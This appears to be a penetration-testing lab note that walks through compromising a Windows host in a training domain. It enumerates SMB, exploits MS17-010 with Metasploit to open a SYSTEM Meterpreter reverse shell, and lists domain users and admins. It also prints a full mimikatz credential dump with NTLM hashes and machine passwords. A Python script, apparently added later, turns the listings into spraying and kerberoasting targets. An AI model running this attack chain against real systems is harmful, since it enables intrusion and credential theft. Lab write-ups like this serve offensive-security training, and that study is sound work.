MCO: 26
[pg]
nmap regular:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 10 Enterprise N 2016 LTSB 14393 microsoft-ds (workgroup: MCO)
smbmap for shares (any username with an empty password falls back to a guest session here):
smbmap -u 'kali' -p '' -H lepton.pg
[+] Guest session    IP: lepton.pg:445    Name: unknown
    Disk        Permissions    Comment
    ----        -----------    -------
    ADMIN$      NO ACCESS      Remote Admin
    C$          NO ACCESS      Default share
    IPC$        READ ONLY      Remote IPC
check SMB vulns (nmap --script smb-vuln*):
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
double-checking with the ms17_010_command auxiliary module, which runs one command as SYSTEM without dropping a payload:
msf5 auxiliary(admin/smb/ms17_010_command) > run
[*] 172.16.10.26:445 - Target OS: Windows 10 Enterprise N 2016 LTSB 14393
[*] 172.16.10.26:445 - Built a write-what-where primitive...
[+] 172.16.10.26:445 - Overwrite complete... SYSTEM session obtained!
[+] 172.16.10.26:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.10.26:445 - checking if the file is unlocked
[*] 172.16.10.26:445 - Getting the command output...
[*] 172.16.10.26:445 - Executing cleanup...
[+] 172.16.10.26:445 - Cleanup was successful
[+] 172.16.10.26:445 - Command completed successfully!
[*] 172.16.10.26:445 - Output for "net group "Domain Admins" /domain":
The request will be processed at a domain controller for domain megacorpone.com.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            agrofield                hax
wsus-srv
The command completed successfully.
metasploit's windows/smb/ms17_010_psexec almost always works once the check comes back VULNERABLE, so…
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 172.16.10.233:4444
[*] 172.16.10.26:445 - Target OS: Windows 10 Enterprise N 2016 LTSB 14393
[*] 172.16.10.26:445 - Built a write-what-where primitive...
[+] 172.16.10.26:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.10.26:445 - Selecting PowerShell target
[*] 172.16.10.26:445 - Executing the payload...
[+] 172.16.10.26:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 172.16.10.26
[*] Meterpreter session 1 opened (172.16.10.233:4444 -> 172.16.10.26:50435) at 2020-05-22 23:37:10 -0700
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
hashdump done; post-exploitation enumeration from the SYSTEM shell:
C:\Windows\system32>net user /domain
The request will be processed at a domain controller for domain megacorpone.com.

User accounts for \\pdc.megacorpone.com

-------------------------------------------------------------------------------
Administrator            agrofield                DefaultAccount
fgodden                  Guest                    hax
jruiz                    jsheer                   krbtgt
mcarlow                  msmith                   rsauns
rsauns-adm               thudson                  trivera
wadler                   wsus-srv
The command completed successfully.
domain admins: agrofield, hax
rdp users: rsauns
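The two listings above (`net group "Domain Admins" /domain` and `net user /domain`) were read off by hand into those short lists. As an added example, not part of the original notes, here is a small Python parser for the net.exe listing format, with the page's two outputs embedded as a constructed sample. The "human admin" filter and the built-in noise list are heuristics of my own, not anything net.exe provides.

```python
"""Parse `net user /domain` and `net group "<group>" /domain` listings into Python lists."""
import re
from typing import List

# Constructed sample: the two outputs from the notes above, with net.exe's
# 25-character column padding already collapsed to single spaces.
NET_USER_OUTPUT = r"""
The request will be processed at a domain controller for domain megacorpone.com.
User accounts for \\pdc.megacorpone.com
-------------------------------------------------------------------------------
Administrator agrofield DefaultAccount
fgodden Guest hax
jruiz jsheer krbtgt
mcarlow msmith rsauns
rsauns-adm thudson trivera
wadler wsus-srv
The command completed successfully.
"""

NET_GROUP_OUTPUT = r"""
The request will be processed at a domain controller for domain megacorpone.com.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator agrofield hax
wsus-srv
The command completed successfully.
"""

# Built-in accounts that are never worth spraying (my own list, extend as needed).
BUILTIN_NOISE = {"DefaultAccount", "Guest", "krbtgt"}

# Heuristic: built-in Administrator, computer accounts (trailing $) and
# service-style names are not people. Assumption of this example, not of net.exe.
SERVICE_LIKE = re.compile(r"(?i)(^administrator$|svc|srv|service|\$$)")


def parse_net_listing(text: str) -> List[str]:
    """Return the account names in a net user / net group listing.

    Names sit between the dashed separator and the trailing status line, in
    three whitespace-padded columns. Caveat: a sAMAccountName containing a
    space (legal, but rare) would be split into two tokens.
    """
    names: List[str] = []
    in_body = False
    for line in text.splitlines():
        if re.fullmatch(r"-{10,}", line.strip()):
            in_body = True
            continue
        if line.startswith("The command completed"):
            break
        if in_body:
            names.extend(line.split())
    return names


def human_admins(members: List[str]) -> List[str]:
    """Named people in a privileged group: the accounts whose sessions to hunt for."""
    return [m for m in members if not SERVICE_LIKE.search(m)]


def next_targets(users: List[str], admins: List[str]) -> List[str]:
    """Accounts to spray or kerberoast next: not built-in noise, not already admin."""
    return [u for u in users if u not in BUILTIN_NOISE and u not in admins]


if __name__ == "__main__":
    admins = parse_net_listing(NET_GROUP_OUTPUT)
    users = parse_net_listing(NET_USER_OUTPUT)
    print("domain admins:", ", ".join(admins))
    print("human admins :", ", ".join(human_admins(admins)))
    print("next targets :", ", ".join(next_targets(users, admins)))
```

The same function handles both listings because net.exe uses one layout for users and group members; only the header lines differ, and the parser ignores everything before the dashed separator.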
dump creds with mimikatz:
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 2427714 (00000000:00250b42)
Session           : Interactive from 0
User Name         : Administrator
Domain            : WS02
Logon Server      : WS02
Logon Time        : 5/23/2020 4:19:47 AM
SID               : S-1-5-21-4259402461-1448266967-4130189754-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : WS02
         * NTLM       : afa568b4714dd373633fa1cba6c9045d
         * SHA1       : a06d969c7ac9c00116d41b4c5337edd38a27963b
        tspkg :
        wdigest :
         * Username   : Administrator
         * Domain     : WS02
         * Password   : (null)
        kerberos :
         * Username   : Administrator
         * Domain     : WS02
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2405899 (00000000:0024b60b)
Session           : Interactive from 0
User Name         : Administrator
Domain            : WS02
Logon Server      : WS02
Logon Time        : 5/23/2020 4:17:57 AM
SID               : S-1-5-21-4259402461-1448266967-4130189754-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : WS02
         * NTLM       : afa568b4714dd373633fa1cba6c9045d
         * SHA1       : a06d969c7ac9c00116d41b4c5337edd38a27963b
        tspkg :
        wdigest :
         * Username   : Administrator
         * Domain     : WS02
         * Password   : (null)
        kerberos :
         * Username   : Administrator
         * Domain     : WS02
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 138071 (00000000:00021b57)
Session           : Interactive from 1
User Name         : msmith
Domain            : MCO
Logon Server      : PDC
Logon Time        : 10/11/2018 8:53:16 AM
SID               : S-1-5-21-2755992450-1486063684-1672926321-1603
        msv :
         [00000003] Primary
         * Username   : msmith
         * Domain     : MCO
         * NTLM       : 4c8066ce21d3ee98e32f7bc32ab1268b
         * SHA1       : 2b512a6b86ae42229f39315cc685334f889b78c4
         * DPAPI      : 5906dbf640b458753ecf85d44e53c82b
        tspkg :
        wdigest :
         * Username   : msmith
         * Domain     : MCO
         * Password   : (null)
        kerberos :
         * Username   : msmith
         * Domain     : MEGACORPONE.COM
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 10/11/2018 8:53:10 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 63688 (00000000:0000f8c8)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 10/11/2018 8:53:10 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : WS02$
         * Domain     : MCO
         * NTLM       : 2c07585025c02f7196a9d2a176f9c054
         * SHA1       : 9e2566ba70d220ad338551f413f8ea6553c5893e
        tspkg :
        wdigest :
         * Username   : WS02$
         * Domain     : MCO
         * Password   : (null)
        kerberos :
         * Username   : WS02$
         * Domain     : megacorpone.com
         * Password   : Y3o<m+nURxZT=/,"Xn(hU_Y);TEH3LzPz4U1dJ&xB7/rROPrRi ";6@]LeC$&;_=6Hf=b*Cu?.Zta_PT9M$hi0c"4h(G^DTB7DPQC*ny7@!(=!,P^+%he'Q$
        ssp :
        credman :

Authentication Id : 0 ; 63446 (00000000:0000f7d6)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 10/11/2018 8:53:10 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : WS02$
         * Domain     : MCO
         * NTLM       : f818a5d0424a1f8c42d58cb043561dc0
         * SHA1       : 76eade68d33942d51cce1a0e4ce68ee3b8f61a72
        tspkg :
        wdigest :
         * Username   : WS02$
         * Domain     : MCO
         * Password   : (null)
        kerberos :
         * Username   : WS02$
         * Domain     : megacorpone.com
         * Password   : <RSa]N_9]z<J>8zT]02\o$GYE6-(1&DGVZV17RUSkB(og]X5E>]0l8^He^:ffc4,jU`hHE_e[c<;gRn+@E1OZKO8Lx3=h'j,WE/%<`?XCZPZ>+e=)+O^5s.$
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WS02$
Domain            : MCO
Logon Server      : (null)
Logon Time        : 10/11/2018 8:53:10 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username   : WS02$
         * Domain     : MCO
         * NTLM       : f818a5d0424a1f8c42d58cb043561dc0
         * SHA1       : 76eade68d33942d51cce1a0e4ce68ee3b8f61a72
        tspkg :
        wdigest :
         * Username   : WS02$
         * Domain     : MCO
         * Password   : (null)
        kerberos :
         * Username   : ws02$
         * Domain     : MEGACORPONE.COM
         * Password   : <RSa]N_9]z<J>8zT]02\o$GYE6-(1&DGVZV17RUSkB(og]X5E>]0l8^He^:ffc4,jU`hHE_e[c<;gRn+@E1OZKO8Lx3=h'j,WE/%<`?XCZPZ>+e=)+O^5s.$
        ssp :
        credman :

Authentication Id : 0 ; 34748 (00000000:000087bc)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 10/11/2018 8:53:09 AM
SID               :
        msv :
         [00000003] Primary
         * Username   : WS02$
         * Domain     : MCO
         * NTLM       : f818a5d0424a1f8c42d58cb043561dc0
         * SHA1       : 76eade68d33942d51cce1a0e4ce68ee3b8f61a72
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WS02$
Domain            : MCO
Logon Server      : (null)
Logon Time        : 10/11/2018 8:53:09 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : WS02$
         * Domain     : MCO
         * Password   : (null)
        kerberos :
         * Username   : ws02$
         * Domain     : MEGACORPONE.COM
         * Password   : (null)
        ssp :
        credman :